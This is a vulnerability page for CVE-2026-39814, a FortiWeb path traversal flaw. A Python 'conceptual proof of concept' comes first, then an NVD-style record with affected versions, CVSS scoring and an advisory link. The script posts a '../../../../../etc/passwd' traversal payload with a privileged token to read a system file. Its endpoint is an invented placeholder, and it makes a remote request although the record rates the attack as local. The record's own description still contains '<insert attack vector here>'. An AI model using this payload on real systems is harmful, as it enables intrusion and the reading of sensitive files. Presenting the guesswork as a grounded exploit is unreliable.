CVE-2026-39814

import requests # Conceptual Proof of Concept for CVE-2026-39814 # Target: Fortinet FortiWeb # Requires: High Privilege Authentication (PR:H) target = "https://<fortiweb-ip>/api/vulnerable_endpoint" headers = { "Authorization": "Bearer <high_privilege_token>" } # Payload attempting to traverse directories payload = { "path": "../../../../../etc/passwd" } try: response = requests.post(target, headers=headers, json=payload, verify=False) if response.status_code == 200: print("[+] Request successful. Check response for file content.") print(response.text) else: print("[-] Request failed.") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-39814", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:45.850", "lastModified": "2026-04-21T17:21:18.140", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A relative path traversal vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.1 through 7.4.12, FortiWeb 7.2.7 through 7.2.12, FortiWeb 7.0.10 through 7.0.12 may allow attacker to execute unauthorized code or commands via <insert attack vector here>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-23"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.10", "versionEndIncluding": "7.0.12", "matchCriteriaId": "788989BE-8E1C-4D12-A7B6-DE308981347C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndIncluding": "7.2.12", "matchCriteriaId": "1DECC3AF-4D0E-4E4B-A9C8-00EE909A9C8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.1", "versionEndIncluding": "7.4.12", "matchCriteriaId": "B4AA9D45-4F5C-4668-B97D-7A2B8185F73E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.7", "matchCriteriaId": "15C9CDE3-FE6F-4946-A3DC-FDD7A5F99D65"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.3", "matchCriteriaId": "C82F9CC0-7683-4CDE-8370-153400605B55"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-114", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}